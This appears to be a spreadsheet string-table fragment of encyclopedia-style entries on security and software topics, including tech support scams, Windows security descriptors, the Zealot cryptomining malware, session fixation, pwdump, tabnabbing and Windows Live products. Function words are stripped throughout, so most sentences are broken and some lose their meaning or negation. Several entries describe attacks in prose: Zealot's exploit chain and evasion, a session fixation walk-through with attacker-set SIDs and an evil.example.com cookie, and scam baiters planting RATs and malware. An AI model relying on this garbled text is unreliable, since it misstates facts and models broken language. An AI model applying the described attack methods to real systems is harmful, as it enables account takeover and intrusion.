advertised". google announced verification program 2018 attempt restrict advertising third-party tech support legitimate companies. scam baiting tech support scammers regularly targeted scam baiting, individuals seeking raise awareness scams uploading recordings platforms like youtube, cause scammers inconvenience wasting time protect potential victims.advanced scam baiters infiltrate scammer's computer, potentially disable deploying rats, distributed denial service attacks destructive malware. scam baiters also attempt lure scammers exposing unethical practices leaving dummy files malware disguised confidential information credit/debit card information passwords virtual machine, scammer attempt steal, become infected. sensitive information important carrying investigations enforcement agency retrieved, additional information rogue firm posted compiled online warn potential victims.in march 2020, anonymous youtuber alias browning successfully infiltrated gathered drone cctv footage fraudulent call centre scam operation help fellow youtube personality karl rock. through british documentary programme panorama, police raid carried documentary brought attention assistant police commissioner karan goel, leading arrest call centre operator amit chauhan also operated fraudulent travel agency name "faremart travels". also cybercrime india list confidence tricks antivirus software advance-fee scam impersonation scam impersonation scam telemarketing fraud virus hoax references further reading "global tech support scam research global summary" (pdf). microsoft corporation. september 2018. external links official microsoft support page technical support scams official symantec support page technical support scams investigation recordings security research group dial scam: large-scale analysis technical support scams</t>
  </si>
  <si>
    <t>Security descriptor</t>
  </si>
  <si>
    <t>security descriptors data structures security information securable windows objects, objects identified unique name. security descriptors associated named objects, including files, folders, shares, registry keys, processes, threads, named pipes, services, objects resources.security descriptors contain discretionary access control lists (dacls) contain access control entries (aces) grant deny access trustees users groups. they also contain system access control list (sacls) control auditing object access. aces explicitly applied object inherited parent object. order aces important, access denied aces appearing higher order aces grant access. security descriptors also contain object owner. mandatory integrity control implemented type security descriptor.files folder permissions edited various tools including windows explorer, wmi, command line tools like cacls, xcacls, icacls, subinacl, freeware win32 console fileacl, free software utility setacl, utilities. edit security descriptor, user needs write_dac permissions object, permission usually delegated default administrators object's owner. permissions ntfs following table summarizes ntfs permissions roles individual rows.) table exposes following information: permission code: each access control entry (ace) specifies permission binary code. there codes older systems.) meaning: each permission code meaning, depending whether applied file folder. example, code 0x01 file indicates permission read file, folder indicates permission list content folder. knowing meaning alone, however, useless. must also specify permission applies, whether permission granted denied. included addition individual permissions, specify special permissions known "generic access rights." these special permissions equivalents number individual permissions. example, generic_read equivalent "read data", "read attributes", "read extended attributes", "read permissions", "synchronize". because makes sense five time, requesting "generic_read" convenient. alias: windows command-line utilities (icacls cacls) aliases permissions.most permissions self-explanatory, except following: renaming file requires "delete" permission. file explorer show "synchronize" always sets multi-threaded apps like file explorer windows command prompt need "synchronize" permission able work files folders. footnotes also access control computer security information technology security audit authorization computer security information security token (windows architecture) windows sddl references external links cacls command description ss64.com setacl sourceforge page</t>
  </si>
  <si>
    <t>Zealot Campaign (Malware)</t>
  </si>
  <si>
    <t>zealot campaign cryptocurrency mining malware collected series stolen national security agency (nsa) exploits, released shadow brokers group windows linux machines mine cryptocurrency, specifically monero. discovered december 2017, exploits appeared zealot suite include eternalblue, eternalsynergy, apache struts jakarta multipart parser attack exploit, cve-2017-5638. notable exploit within zealot vulnerabilities includes vulnerability cve-2017-9822, known dotnetnuke (dnn) exploits content management system user install monero miner software. estimated $8,500 monero mined single targeted computer. campaign discovered studied extensively networks december 2017. works with many zealot exploits leaked nsa, malware suite widely described unusually high obfuscated payload”, meaning exploit works multiple levels attack vulnerable server systems, causing large amounts damage. term “zealot” derived starcraft series, namely type warrior. introduction this multi-layered attack begins http requests, used scan target vulnerable systems network. similar attacks past targeted either windows linux-based systems, zealot stands prepared version apache struts exploit along using dnn. post-exploitation stage after operating system (os) identified javascript, malware loads os-specific exploit chains: linux/macos targeted system runs either linux macos, struts payload install python agent post-exploitation stage. after checking target system already infected, downloads cryptocurrency mining software, often referred “mule”. from there, obfuscates embedded python code process. different botnet malware, zealot campaigns request command control (c&amp;c) server-specific user-agent cookie headers, meaning anyone malware receive different response. zealot encrypting cipher, below, network inspection security software able malware network, able scan windows targeted windows, struts payload downloads encoded powershell interpreter. once decoded times, program runs another obfuscated script, turn leads device download files. that file, known powershell script “scv.ps1”, heavily obfuscated script allows attacker deploy mining software targeted device. deployed software also dynamic-link library (dll) mining malware, deployed using reflective injection technique attach malware powershell processing itself, remain undetected. scanning firewall prior moving onto next stage, program also checks firewall active. yes, pipe embedded base64 embedded python code circumvent firewall. another possible solution known “little snitch”, possibly terminate firewall active. infecting internal networks from post-exploitation stage, program scans target system python higher, found system, download following that, downloads python module (probe.py) propagate network, script highly obfuscated base encryption base64 zipped times. downloaded file could named several iterations, derived starcraft game. files included listed below: zealot.py main script executing eternalblue eternalsynergy exploits, below. a0.py eternalsynergy exploit built-in shellcode windows a1.py eternalblue exploit windows receives shellcode argument a2.py eternalblue exploit windows receives shellcode argument m.py protocol wrapper raven64.exe scans internal network port invokes zealot.py filesafter files successfully, miner software introduced. mining known commonly “mule” malware, powershell script named “minerd_n.ps2” within compressed files downloaded executed eternalsynergy exploit. software utilizes target system’s hardware process mining cryptocurrency. this mining software reportedly stolen close $8,500 victim, total amounts mined monero still speculated among researchers. exploits involved eternalblue initially utilized wannacry ransomware attack 2017, exploit specifically utilized mining software zealot campaign. eternalsynergy while much known exploit, used cooperation eternalblue, along exploits zealot campaign others. most notably, eternalsynergy involved equifax hack, wannacry ransomware, cryptocurrency mining campaigns. asp.net based content management system, (formerly dotnetnuke) sends serialized object vulnerable dnnpersonalization cookie http request stage. using “objectdataprovider” “objectstateformatter”, attacker embeds another object victim’s shell system. this invoked shell system deliver script delivered apache struts exploit. acts secondary backup attackers, apache struts exploit fail. apache struts jakarta multipart parser used deliver powershell script initiate attack, exploit http requests sent initial stage infection. among first discovered exploits zealot campaign, jakarta parser exploit allowed hackers exploit “zero-day” flaw software hack financial firm, equifax march 2017. this particular exploit notable public exploits, utilized largely public case, still utilized december 2017, exploit patched. uses lazarus group bangladeshi-based group utilized spear-phishing method, known commonly business email compromise (bce), steal cryptocurrency unsuspecting employees. lazarus primarily targeted employees cryptocurrency financial organizations, executed word document, claiming legitimate-appearing european company. when document opened, embedded trojan virus would load onto system computer begin steal credentials malware. while specific malware still unknown, ties zealot malware. equifax data breach (2017) among several exploits involved march 2017 equifax data breach, jakarta parser, eternalblue, eternalsynergy heavily involved attacking servers. instead software utilized mine cryptocurrency, used mine data million equifax customers. references</t>
  </si>
  <si>
    <t>Session fixation</t>
  </si>
  <si>
    <t>computer network security, session fixation attacks attempt exploit vulnerability system allows person fixate (find set) another person's session identifier. most session fixation attacks based, rely session identifiers accepted urls (query string) post data. attack scenarios alice account bank http://unsafe.example.com/ mallory intends target alice's money bank. alice reasonable level trust mallory, visit links mallory sends her. simple attack scenario straightforward scenario: mallory determined http://unsafe.example.com/ accepts session identifier, accepts session identifiers query strings security validation. http://unsafe.example.com/ thus secure. mallory sends alice e-mail: "hey, check out, cool account summary feature bank, http://unsafe.example.com/?sid=i_will_know_the_sid". mallory trying fixate i_will_know_the_sid. alice interested visits http://unsafe.example.com/?sid=i_will_know_the_sid. usual log-on screen pops alice logs mallory visits http://unsafe.example.com/?sid=i_will_know_the_sid unlimited access alice's account. attack using server generated misconception server accepts server-generated session identifiers, safe fixation. this false. scenario: mallory visits http://vulnerable.example.com/ checks returned. example, server respond: set-cookie: sid=0d6441fea4496c2. mallory able send alice e-mail: "check cool feature bank, http://vulnerable.example.com/?sid=0d6441fea4496c2." alice logs fixated session identifier sid=0d6441fea4496c2. mallory visits http://vulnerable.example.com/?sid=0d6441fea4496c2 unlimited access alice's account. attacks using cross-subdomain cookie this type attack similar cross-site cookie attack except that, rely vulnerability user's browser. rather, relies fact wildcard cookies subdomain and, cookies affect subdomains. scenario: site www.example.com hands subdomains untrusted third parties party, mallory, controls evil.example.com, lures alice site visit evil.example.com sets session cookie domain .example.com alice's browser when alice visits www.example.com cookie sent request alice session specified mallory's cookie. alice logs mallory account.when attack complete, mallory gain access www.example.com alice. essential user login exploit session fixation attacks and, although unauthenticated attacks constrained cross-sub-domain cookie attacks, implications sub-domain attacks relevant unauthenticated scenarios. example, mallory provide evil site, fixating session unauthenticated scenario, techniques exploit target. this includes scenarios exploiting unauthenticated scenarios (e.g. forms registration) well ability feed user established session bypass login completely. consider, example, mallory create user a1ice www.example.com login user capture current, valid session identifier. mallory entraps alice evil.example.com fixates session cookie alice's browser described above) redirects www.example.com finalizing particular transaction (or, fact, broader use). mallory thus able ghost session original login, scraping data executing operations 'a1ice' 'www.example.com'. alice successfully duped saved credit card account, mallory might make purchases using card. countermeasures accept session identifiers post variables session identifiers (query string, variables) post variables recommended simplify attack easy make links forms post variables. leaked people users paste "interesting links" address chats, forums, communities, etc. stored many places (browser history log, server log, proxy logs, ...)note: cookies shared tabs popped browser windows. system requires domain (www.example.com/?code=site1 www.example.com/?code=site2 cookies conflict another tabs. required send session identifier order overcome limitation. possible site1.example.com site2.example.com domain conflicts cookies. this incur costs extra certificates. this behavior seen many sites opening another trying side side search results. sessions become unusable. best solution: identity confirmation this attack largely avoided changing session users every request specific user requires user authenticated ("logged into") site, attacker would need know victim's log-in session. when victim visits link fixed session however, need account order anything "important" themselves. point, session change, attacker able anything "important" anonymous session similar technique used solve phishing problem. user protects account passwords, solved great extent. this technique also useful cross-site request forgery attacks. solution: store session identifiers http cookies session identifier modern systems stored default http cookie, moderate level security long session system disregards get/post values. however, solution vulnerable cross-site request forgery, meet statelessness requirement rest. solution: utilize session identifier when enabling https security, systems allow applications obtain session identifier. ssl/tls session identifier secure, many development languages provide robust built-in functionality this. regenerate request countermeasure session fixation generate session identifier (sid) request. done, even though attacker trick user accepting known sid, invalid attacker attempts re-use sid. implementation system simple, demonstrated following: previous session identifier old_sid http request. old_sid null, empty, session sid=old_sid exists, create session. generate session identifier new_sid secure random number generator. session identified sid=new_sid (and longer sid=old_sid) transmit client.example: mallory successfully tricks alice visiting http://victim.example.com/?sid=i_know_the_sid, http request sent victim.example.com: victim.example.com accepts sid=i_know_the_sid, would normally bad. however, victim.example.com secure performs session regeneration. victim.example.com gets following response: alice sid=3134998145ab331f unknown mallory, sid=i_know_the_sid invalid. mallory thus unsuccessful session fixation attempt. unfortunately session regeneration always possible. problems known occur third-party software activex java applets used, browser plugins communicate server. third-party software could cause logouts, session could split separate sessions. implementation sessions includes transmitting post variables, might also render "back" button browsers unusable, user would using older, invalid, session identifier previous request. accept server-generated sids improve security accept session identifiers generated server. however, noted above, prevent session fixation attacks. logout function logout function useful allows users indicate session allow requests. thus attacks effective session active. note following code performs cross-site request forgery checks, potentially allowing attacker force users application. time-out sids this defense simple implement advantage providing measure protection unauthorized users accessing authorized user's account using machine left unattended. store session variable containing time stamp last access made sid. when used again, compare current timestamp stored session. difference greater predefined number, minutes, destroy session. otherwise, update session variable current timestamp. destroy session referrer suspicious when visiting page, browsers referrer header page contained link followed page. when user logged site likely linked outside site (e.g., banking websites, webmail), site kind site users would remain logged great length time, referrer site. referrer considered suspicious. however, originating request https page, referrer stripped, cannot depend security system. example, http://vulnerable.example.com/ could employ following security check: verify additional information consistent throughout session improve security ensure user appears user (client). this makes harder perform session fixation attacks. networks begin conform 3704 anti-spoofing practices, address becomes reliable "same source" identifier. therefore, security site improved verifying source address consistent throughout session. this could performed manner: however, points consider employing approach. several users share address. uncommon entire building share address using nat. user inconsistent address. this true users behind proxies (such customers). also true mobile/roaming users, well users behind load balanced internet connections. users ipv6 privacy extensions enabled also change ipv6 privacy addresses time. work reliably dual stack clients requests move ipv4 ipv6. work reliably mobile users, mobile users roam addresses well.for sites, added security outweighs lack convenience, others not. user agent browsers identify "user-agent" http headers. this header normally change use; would extremely suspicious happen. application might make user-agent detection attempt prevent malicious users stealing sessions. this however trivial bypass, attacker easily capture victim's user-agent site spoof attack. this proposed security system relying security obscurity. however, points consider employing approach. several users browser user agent internet café. several users default browser (ex: internet explorer windows mini browser mobile phone).but user agent change legally cases. following examples users. smartphone whose screen rotated since last request mozilla/5.0 (linux; android 2.2; en-us; droid2 build/vzw) applewebkit/533.1 (khtml, like gecko) version/4.0 mobile safari/533.1 854x480 motorola droid2 mozilla/5.0 (linux; android 2.2; en-us; droid2 build/vzw) applewebkit/533.1 (khtml, like gecko) version/4.0 mobile safari/533.1 480x854 motorola droid2 internet explorer compatibility mode: mozilla/4.0 (compatible; msie 8.0; windows 5.1; trident/4.0; .net 3.0.4506.2152; .net 3.5.30729) mozilla/4.0 (compatible; msie 7.0; windows 5.1; trident/4.0; .net 3.0.4506.2152; .net 3.5.30729) user accessing site proxy distributed across multiple servers, upgraded latest version proxy software mozilla/5.0 (macintosh; intel 10.6; en-us; rv:1.9.2) gecko/20100115 firefox/3.6 (flipboardproxy/0.0.5; +http://flipboard.com/browserproxy) mozilla/5.0 (macintosh; intel 10.6; en-us; rv:1.9.2) gecko/20100115 firefox/3.6 (flipboardproxy/1.1; +http://flipboard.com/browserproxy) defense depth defense depth combine several countermeasures. idea simple: obstacle trivial overcome, several obstacles could hard overcome. defense depth strategy could involve: enable https protect problems) correct configuration accept external sids, time-out, etc.) perform session_regeneration, support log-out, etc.http referrers passed ssl/tls (https). following script demonstrates several countermeasures combined defense depth manner: note code checks current remote_addr (the user's address) user-agent remote_addr user-agent previous request. this might inconvenient sites discussed above. also session poisoning privilege escalation references external links security corner: session fixation session fixation vulnerability web-based applications (pdf) session fixation video example application security consortium threat classification</t>
  </si>
  <si>
    <t>Pwdump</t>
  </si>
  <si>
    <t>pwdump name various windows programs outputs ntlm password hashes local user accounts security account manager (sam) database active directory domain's users cache operating system. widely used, perform famous pass-the-hash attack also used brute-force users' password directly. order work, must administrator account, able access administrator account computer hashes dumped. pwdump could said compromise security could allow malicious administrator access user's passwords. history initial program called pwdump written jeremy allison. published source code 1997 (see open-source). since developments programmers: pwdump (1997) original program jeremy allison. pwdump2 (2000) todd sabin bindview (gpl), uses injection. pwdump3 phil staubs (gpl), works network.pwdump3e phil staubs (gpl), sends encrypted network. pwdump4 bingle (gpl), improvement pwdump3 pwdump2. pwdump5 antonyo! (freeware). pwdump6 2006) fizzgig (gpl), improvement pwdump3e. source code.fgdump (2007) fizzgig, improvement pwdump6 addons. source code. pwdump7 andres tarasco (freeware), uses filesystem drivers. source code. pwdump8 fulvio zanetti andrea petralia, supports aes128 encrypted hashes (windows later). source code. notes references allison, jeremy september 2012). "index /pub/samba/pwdump". samba. retrieved june 2017. sabin, todd february 2017). "new version pwdump2 allows dumping password hashes active directory". securiteam.com. retrieved june 2017. "pwdump8". forums.hak5.org. 2019.</t>
  </si>
  <si>
    <t>Tabnabbing</t>
  </si>
  <si>
    <t>tabnabbing computer exploit phishing attack, persuades users submit login details passwords popular websites impersonating sites convincing user site genuine. attack's name coined early 2010 raskin, security researcher design expert. attack takes advantage user trust inattention detail regard tabs, ability browsers navigate across page's origin inactive tabs long time page loaded. tabnabbing different phishing attacks user longer remembers certain result link unrelated login page, fake login page loaded long-lived open tabs browser.the attack causes browser navigate impersonated page page left unattended time. user returns sees login page induced believe page legitimate enter login, password details used improper purposes. attack made likely succeed attacker able check well known websites user loaded past tabs, loads simulation sites. this attack done even javascript disabled, using "meta refresh" meta element, html attribute used page redirection causes reload specified page given time interval.the noscript extension mozilla firefox defends javascript-based scriptless attack, based meta refresh, preventing inactive tabs changing location page. because legitimate purposes inactive redirects, cannot disabled browsers default without breaking applications. attack also common, giving browser vendors little incentive implement breaking change. example detect logged citibank right citibank training account every minutes logs better security. it's like wrong sword", said raskin. also phishing hacker (computer security) references external links "devious phishing tactic targets tabs". krebs security. 2010-05-10.</t>
  </si>
  <si>
    <t>Richacls</t>
  </si>
  <si>
    <t>richacls linux implementation nfsv4 acls extended file masks easily standard posix file permission model. nowadays, offer complex permission model ext4 file system linux. they even complex posix acls, means possible convert back richacls posix acls without losing information. important advantages distinguish write append permission, delete delete child permissions, make management access discretionary opposed root file owner). they also designed support windows interoperability.richacls ext4 extended file attributes (xattrs) store acls. references</t>
  </si>
  <si>
    <t>SAS Institute Inc v World Programming Ltd</t>
  </si>
  <si>
    <t>institute, creators system filed lawsuit world programming limited, creators world programming system (wps) november 2009. dispute whether world programming infringed copyrights institute products manuals, whether world programming used learning edition reverse engineer system violation term usage. case interesting world programming access institute's source code, court considered merits copyright claim based observing functionality only. european committee interoperable systems case important software industry. some observers case important borland versus lotus case. court justice ruled copyright protection extend software functionality, programming language used format data files used program. stated copyright infringement company access source code program studies, observes tests program create another program functionality. high court england wales july 2010 justice arnold high court england wales referred number questions court justice european union (cjeu), expressed initial views main claims following observations initial judgment ([2010] ewhc 1829 (ch, [2011] preferred interpretation article 5(3), wpl's learning edition within article 5(3), extent licence terms prevent null void, result none wpl's acts complained breach contract infringement copyright except perhaps (see paragraphs 313-315 initial judgment).2 infringed copyrights manuals substantially reproducing manual (see paragraphs 317-319 initial judgment).3 infringed copyrights manuals producing guides (see paragraphs 320-329 initial judgment).4 assumption pumfrey interpretation article 1(2) software directive (from navitaire easyjet [2004]) correct, infringed institute's copyrights components producing (see paragraphs 245-250 initial judgment).justice arnold quoted paragraph "sas language" article wikipedia april 2010) support view "programming language" (and thus protected software directive): "sas considered general programming language, though serves largely database programming language language wide variety specialized analytic graphic procedures."first, decision confirms always admitted, namely used manuals emulate functionality system wps. secondly, shows extent reproduced aspects manuals going beyond strictly necessary order emulate functions system. what show reproduction source code going beyond reproduction functionality. wpl's manual writers directly copy manuals sense manuals open front writing manual intentionally either transcribing paraphrasing wording. considerable degree similarity content language manual entries manual entries expected given describing identical functionality. degree resemblance language goes beyond attributable describing identical functionality. justice arnold referred certain questions cjeu. after cjeu handed decision later 2012, justice arnold high court handed final judgement january 2013, concluded summarised final statement judgment): "82. reasons given above, dismiss institute's claims except claim respect manual. that claim succeeds extent indicated first judgment, further." court justice european union reference high court referred several questions interpretation computer programs directive information society directive court justice european union, preliminary ruling procedure. advocate-general yves gave opinion november 2011. full judgement handed european court justice 2012. largely adopted advocate-general's opinion, holding neither functionality computer program programming language format data files used computer program order exploit certain functions covered copyright.the court concluded that: article 1(2) computer programs directive (council directive 91/250/eec 1991) must interpreted meaning neither functionality computer program programming language format data files used computer program order exploit certain functions constitute form expression program and, such, protected copyright computer programs purposes directive.2. article 5(3) computer programs directive must interpreted meaning person obtained copy computer program licence entitled, without authorisation owner copyright, observe, study test functioning program determine ideas principles underlie element program, case person carries acts covered licence acts loading running necessary computer program, condition person infringe exclusive rights owner copyright program.3. article 2(a) information society directive (directive 2001/29/ec european parliament council 2001) must interpreted meaning reproduction, computer program user manual program, certain elements described user manual another computer program protected copyright capable constituting infringement copyright latter manual matter national court ascertain reproduction constitutes expression intellectual creation author user manual computer program protected copyright.the case returned high court england wales provided final judgement january 2013 applying cjeu findings particular facts case. lawsuit (initial filing) initial case filed institute dismissed institute inc., plaintiff, world programming limited, defendant.in briefing, parties raised court’s consideration variety interesting complex questions law. considering able arguments counsel sides, court unable conclude clearly erred dismissing action forum conveniens. such, reasons forth particularly above, plaintiff’s motion alter amend judgment pursuant rule 59(e) denied.so ordered, 22nd june, 2011. lawsuit (subsequent filing) subsequent case filed institute sas. after three-week trial ended october 2015, jury federal court awarded $79.1 million damages, trebling. jury ruled engaged unfair deceptive trade practices specifically, misrepresented intentions order obtain license software, violated contract granted, allowed non-commercial infringed copyright manual copying portions manual. however, judge flanagan ruled summary judgement infringed copyright sas's software. announced intention appeal. implications case limited aspects computer programs eligible copyright protection, subsequently cited case oracle corporation's lawsuit google latter's java android. references external links final high court judgment initial high court judgment judgment</t>
  </si>
  <si>
    <t>Riskified</t>
  </si>
  <si>
    <t>riskified publicly traded company provides software service (saas) fraud chargeback prevention technology. riskified’s technology uses behavioral analysis, elastic linking, proxy detection, machine learning detect prevent fraud. riskified backs transactions approved technology chargeback 100% money-back guarantee event fraud.riskified founded 2012 eido assaf feldman. 2018, riskified secured $63.7 million funding. november 2019, riskified announced series funding round $165 million, general atlantic joined fidelity management research, winslow capital, existing investors.on july 2021, riskified launched initial public offering nyse, valuing company $4.3 billion. references external links official website business data riskified ltd.:</t>
  </si>
  <si>
    <t>Windows Live OneCare</t>
  </si>
  <si>
    <t>windows live onecare (previously windows onecare live, codenamed computer security performance enhancement service developed microsoft windows. core technology onecare multi-platform (reliable anti-virus), microsoft purchased gecad software 2003, subsequently discontinued. software available annual paid subscription, could used three computers. november 2008, microsoft announced windows live onecare would discontinued june 2009 instead offering users free anti-malware suite called microsoft security essentials available then. however, virus definitions support onecare would continue subscription expires. end-of-life announcement, microsoft noted windows live onecare would upgraded work windows would also work windows mode. history windows live onecare entered beta state summer 2005. managed beta program launched public beta, located betaplace, microsoft's former beta delivery system. 2006, windows live onecare made official debut retail stores united states.the beta version windows live onecare released early october 2006 microsoft. version released manufacturing january 2007 made available public january 2007. july 2007, beta testing started version 2.0, final version released november 2007. microsoft acquired komoku march 2008 merged computer security software windows live onecare.windows live onecare (build 2.5.2900.28) final released july 2008. day, microsoft also released windows live onecare server 2.5. features windows live onecare features integrated anti-virus, personal firewall, backup utilities, tune-up utility integrated functionality windows defender malware protection. future addition registry cleaner considered added "there significant customer advantages functionality". version added features multi-pc home network management, printer sharing support, start-time optimizer, proactive fixes recommendations, monthly reports, centralized backup, online photo backup.windows live onecare built ease-of-use designed home users. onecare also attempts minimal interface lessen user confusion resource use. adds icon notification area tells user glance status system's health using three alert colors: green (good), yellow (fair), risk). compatibility version onecare compatible versions windows windows vista. version onecare supports compatibility vista. version 2.5, microsoft released windows live onecare server supports windows server 2008 standard 64-bit windows small business server 2008 standard premium editions. edition onecare operates safe mode. windows live onecare support windows development discontinued replaced microsoft security essentials. activation windows live onecare requires users activate product wish continue using free trial period days) valid windows live when product activated, grey message program disappears. subscription remains active year date activation. windows live onecare require operating system checked windows genuine advantage. protection windows live onecare protection plus security component onecare suite. consists three parts: personal firewall capable monitoring blocking incoming outgoing traffic (the built-in windows firewall windows monitors blocks incoming traffic) anti-virus tool uses regularly updated anti-virus definition files protect malicious software anti-spyware tool uses windows defender engine core protect potentially unwanted software version 1.0, required separate installation windows defender integrated onecare interface, although could managed launched onecare. version integrated windows defender engine onecare longer requires separate installation.)windows live onecare onwards also monitors internet explorer security settings ensures automatic website checking feature phishing filter enabled. performance windows live onecare performance plus component performs monthly tune-up related tasks, disk cleanup defragmentation. full virus scan using anti-virus component suite. user notification files need backing check windows updates using microsoft update service. backup windows live onecare backup restore component aids backing important files. files backed various recordable media, external hard disks, cds, dvds. when restoring files, entirety subset also restored networked computer, long running onecare well. backup restore component supports backup software features incremental backups scheduling. criticism windows live onecare criticized users competing security software companies. microsoft's acquisition gecad rav, core technology onecare, subsequent discontinuation product, deprived linux platform (and others) leading virus scanning tools e-mail servers, bringing microsoft's ultimate intentions question.on january 2006, windows live onecare criticized foundstone division competing mcafee anti-virus) integrated firewall default white lists allow java applications digitally signed software bypass user warnings, since neither applications carry assurances security flaws written malicious intent. microsoft since responded criticism, justifying decision java applications "widely used third party applications, popular trusted program among users", highly unusual malware signed."windows live onecare also criticized lack adherence industry firewall standards concerning intrusion detection. tests conducted agnitum (the developers outpost firewall) shown onecare failing detect trojans malware hijack applications already resident infected machine.in february 2007, first windows vista anti-virus product testing virus bulletin magazine sister company sophos, developers sophos anti-virus) found windows live onecare failed detect 18.6% viruses. fifteen anti-virus products tested. pass virus bulletin's vb100 test, anti-virus product detect 100% viruses. av-comparatives also released results placed windows live onecare last testing seventeen anti-virus products. response, jimmy microsoft security research response (msrr) team pledged "truly important" ("actively spread") malware soon possible, "[test detection] numbers better better" malware "until majors arena." also expressed confidence improvements: "soon after, [other majors] need catch us!"as april 2008, windows live onecare passed vb100 test windows vista business edition. august 2008, windows live onecare placed 14th anti-virus products on-demand virus detection rates. hand, 2009, windows live onecare placed proactive/retrospective performance test conducted av-comparatives. av-comparatives.org, test issuer, denotes "very false alarms, good achievement." publisher also points false positives cause much harm genuine infections, furthermore, anti-virus scanners prone false alarms essentially achieve higher detection scores. community revival after windows live onecare discontinued, end-users product could longer install windows live onecare installer checking microsoft onecare's site updates. this resulted installation giving error message 'network problems preventing windows live onecare installation continuing time'. youtuber name 'michael mjd' posted review software second channel 'mjdextras' finding thrift-store unable software installed error; community member 'cobs server closet' requested copy installation media issue. october 20th 2020, 'cobs server closet' posted website they'd successfully recreated functioning version installer, allowing end-users owning existing installation media reinstall software. this project named 'onecare rewritten'.while onecare rewritten software allow successful installation onecare, many notable features onecare circles built-in backup feature remain non-functional result dependant microsoft windows live onecare servers. also windows defender windows live comparison antivirus software references external links microsoft develops anti-virus product wikinews</t>
  </si>
  <si>
    <t>Windows Live OneCare Safety Scanner</t>
  </si>
  <si>
    <t>windows live onecare safety scanner (formerly windows live safety center codenamed vegas) online scanning, cleanup, diagnosis service help remove viruses, spyware/adware, malware. free service part windows live. november 2008, microsoft announced discontinuation windows live onecare, offering users free anti-malware suite microsoft security essentials, available since second half 2009. however, windows live onecare safety scanner, branding windows live onecare, discontinued time. service officially discontinued april 2011 replaced microsoft safety scanner. overview windows live onecare safety scanner offered free online scanning protection threats. windows live onecare safety scanner must downloaded installed computer scan computer. "full service scan" looks common health issues viruses, temporary files, open network ports. searches removes viruses, improves computer's performance, removes unnecessary clutter pc's hard disk. user choose "full scan" (which customized) "quick scan". "full scan" scans viruses (comprehensive scan quick scan), hard disk performance (disk fragmentation scan and/or desk cleanup scan) network safety (open port scan). "quick scan" scans viruses, specific areas computer. quick scan faster full scan, hence appellation.the service also provides virus database, information online threats, general computer security documentation tools. limits virus scanner windows live onecare safety scanner site runs scan user's computer site visited. periodic scans system, provide features prevent viruses infecting computer time, thereafter. simply resolves detected infections. many users posted product feedback forum report script errors relating internet explorer (besides browser supported service). onecare safety scanner team actively solving problems, many registry-related. references</t>
  </si>
  <si>
    <t>Windows Live Messenger</t>
  </si>
  <si>
    <t>messenger (also known colloquially simply "messenger"), later rebranded windows live messenger, discontinued cross-platform instant-messaging client developed microsoft. connected microsoft messenger service and, later versions, compatible yahoo! messenger facebook messenger. versions developed windows, xbox 360, (later name microsoft messenger mac), blackberry ios, java symbian 9.x, zune windows phone, windows mobile windows client first released messenger service july 1999, marketed brand 2005, rebranded windows live name. since officially known latter name, although first name remained common use. june 2009, microsoft reported service attracted million active users month, placing among widely used instant-messaging clients world.following acquisition skype technologies 2011, microsoft added interoperability skype microsoft accounts, allowing skype—which features unique platform wider user base—to communicate windows live messenger contacts. 2013, product discontinued, microsoft began cutting service existing clients. remained active china another months, ceased operations october 2014. history messenger 1.0–7.5 (1999–2005) before product renamed windows live messenger, named "msn messenger" 1999 2006. during time, microsoft released seven major versions follows. first version messenger service, version (1.0.0863), released july 1999. included basic features, plain text messaging simplistic contact list. when first released, featured support access america online's network. america online continually tried block microsoft access service eventually feature removed, re-surfaced later versions software. exploiting buffer overflow aim, causes execute machine code sent server. when code runs, determines client sends message back verify client. since then, software allowed connections service, requiring windows live (.net passport time) account connect. microsoft released first major update, version (2.0.0083), november 1999. included rotating advertising banner ability customize appearance chat window. came install option windows this version followed next year version (3.0.0080), released 2000. included file transfers pc-to-pc pc-to-phone audio capabilities net2phone callserve, larger voip providers. along release windows came version messenger, october 2001. included major changes user interface, ability group contacts, support voice conversations. version, client software renamed "msn messenger service" "msn messenger," underlying service became known ".net messenger service". this version compatible windows 4.0, 2000, microsoft provided scaled-down program windows called windows messenger. version messenger released october 2002. first version allowed installed along windows messenger windows included upnp (universal plug play) based file transfers, minor changes user interface artwork, windows media player interface plug-in.version messenger released july 2003. messenger major overhaul whole platform, upgrading simple text-based interface include customizable elements emoticons, personalized avatars, backgrounds. update, version 6.1, focused improvements conversation window, enabling users hide window frame menu bar, also ability change theme color. theme color could differently user. another update, version 6.2, released april 2004, last version messenger series. notable changes dedicated mobile group mobile contacts, connection troubleshooter, launch site feature renamed games. messenger received major upgrade version april 2005. this version brought wink features previously available threedegrees. this version also advertised items sell including animated display pictures, emoticons backgrounds. contact list window style also updated match instant message windows. this version also introduced xbox live integration feature. this version also introduced digital handwriting recognition support. last version messenger support windows windows windows 2000. last version messenger name change, version 7.5, released august 2005. features included dynamic backgrounds feature "msnim" protocol handler, allowed sites provide links automatically contact start conversations. additionally, voice clips feature allowed users hold record message maximum seconds send recipient. window conversations changed slightly added video button. this version also introduced windows installer auto-update feature. windows live messenger 8.0–8.5 (2005–2009) part microsoft's windows live effort, rebranded many existing services programs, messenger renamed "windows live messenger" beginning version 8.0. first beta newly renamed windows live messenger, beta released december 2005. major changes additions included offline messaging, option change color theme windows, separated send search boxes, word wheel search main window, additional details contacts hovering names contact list window. second beta version 8.0, beta released february 2006. overall theme version improved, fixing improving several smaller places program. major changes additions included introduction windows live contacts, reintroduction single file transfer, improvements "add contact" dialog box, improved color themes, minor changes conversation window, revert "busy" status icon back normal dash icon.the final beta version, beta released 2006. major changes additions included icons program, pc-to-phone calling, updated look windows live call window, default display picture, windows live today window, improvements grouping sequential messages contact, rhapsody integration u.s., option sounds edited and/or turned off.the official release windows live messenger version june 2006. although notable changes made beta final version, change messenger windows live messenger brought additional changes, customization nicknames individual contacts, timestamps messages, ability contact's name person writes multiple messages row, color schemes entire application. main authentication system, microsoft passport network, replaced windows live time. refresh version released august 2006. included audio video improvements fixed minor bugs.the first update windows live messenger previewed october 2006, release beta version 8.1. major changes made, several minor changes included. these include addition roaming identity feature user's display name picture would appear computer), contact card appearance, "recently used" list emoticon, wink, display picture background menus, phone book main menu allowing association editing phone number contact allowing text messaging contact, "sign out" button, "report abuse" option help menu, interoperability yahoo! messenger, improvements user status windows vistaa minor update, windows live messenger beta refresh, released december 2006, fixed bugs causing people unable sign others unable contact list.the final version released january 2007. changes made beta refresh. versions windows live messenger version rendered obsolete september 2007, security issue identified user accepts webcam video chat invitation attacker.on september 2007, windows live messenger blog posted resolved security problem. reported security vulnerability versions messenger older 8.1, released would resolve. this auto-update released older versions. versions running windows 2000 required update version messenger 7.0, versions running windows required update windows live messenger 8.1.on august 2009, windows live messenger blog posted security 